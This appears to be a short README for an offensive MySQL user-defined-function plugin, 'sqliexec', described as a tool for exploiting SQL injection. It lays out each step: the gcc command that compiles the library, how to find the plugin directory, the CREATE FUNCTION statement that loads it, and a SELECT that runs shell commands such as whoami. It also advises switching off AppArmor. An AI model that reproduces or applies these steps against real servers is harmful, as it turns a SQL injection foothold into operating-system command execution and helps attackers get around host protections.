mssql's cmdexec-like for mysql, useful when exploiting sql injection on a mysql server.
Deskripsi: Tulis pustaka yang dikompilasi ke direktori plugins mysql & muat untuk dapat menjalankan perintah shell seperti cmdexec mssql
Compile Example:
gcc -fPIC -Wall -I/usr/include/mysql -shared -o sqliexec.so sqliexec.c // on ubuntu with installed headers
Find Plugin DIR:
SHOW VARIABLES LIKE '%plugin%';
Install:
CREATE FUNCTION sqliexec RETURNS STRING SONAME 'sqliexec.so';
Run:
SELECT sqliexec('whoami');
Notes: make sure AppArmor is turned off for mysql on linux machines
Author: Kasif Dekel
Version: 1.0